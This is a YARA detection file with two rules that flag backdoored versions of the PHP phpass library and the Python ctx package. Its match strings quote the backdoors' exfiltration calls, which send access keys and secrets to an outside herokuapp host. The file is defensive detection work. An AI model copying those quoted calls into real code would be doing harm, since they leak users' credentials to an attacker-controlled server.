31 lines
1.1 KiB
Text
31 lines
1.1 KiB
Text
|
|
||
|
rule VULN_PHP_Hack_Backdoored_Phpass_May21 {
|
||
|
meta:
|
||
|
description = "Detects backdoored PHP phpass version"
|
||
|
author = "Christian Burkard"
|
||
|
reference = "https://twitter.com/s0md3v/status/1529005758540808192"
|
||
|
date = "2022-05-24"
|
||
|
score = 75
|
||
|
id = "da13924c-0448-589c-bb2a-ee09736a5602"
|
||
|
strings:
|
||
|
$x1 = "file_get_contents(\"http://anti-theft-web.herokuapp.com/hacked/$access/$secret\")" ascii
|
||
|
condition:
|
||
|
filesize < 30KB and $x1
|
||
|
}
|
||
|
|
||
|
rule VULN_Python_Hack_Backdoored_Ctx_May21 {
|
||
|
meta:
|
||
|
description = "Detects backdoored python ctx version"
|
||
|
author = "Christian Burkard"
|
||
|
reference = "https://twitter.com/s0md3v/status/1529005758540808192"
|
||
|
date = "2022-05-24"
|
||
|
score = 75
|
||
|
hash1 = "4fdfd4e647c106cef2a3b2503473f9b68259cae45f89e5b6c9272d04a1dfaeb0"
|
||
|
hash2 = "b40297af54e3f99b02e105f013265fd8d0a1b1e1f7f0b05bcb5dbdc9125b3bb5"
|
||
|
hash3 = "b7644fa1e0872780690ce050c98aa2407c093473031ab5f7a8ce35c0d2fc077e"
|
||
|
id = "55c1326a-6a5f-5d6f-b798-2c8516faffe2"
|
||
|
strings:
|
||
|
$x1 = "requests.get(\"https://anti-theft-web.herokuapp.com/hacked/"
|
||
|
condition:
|
||
|
filesize < 10KB and $x1
|
||
|
}
|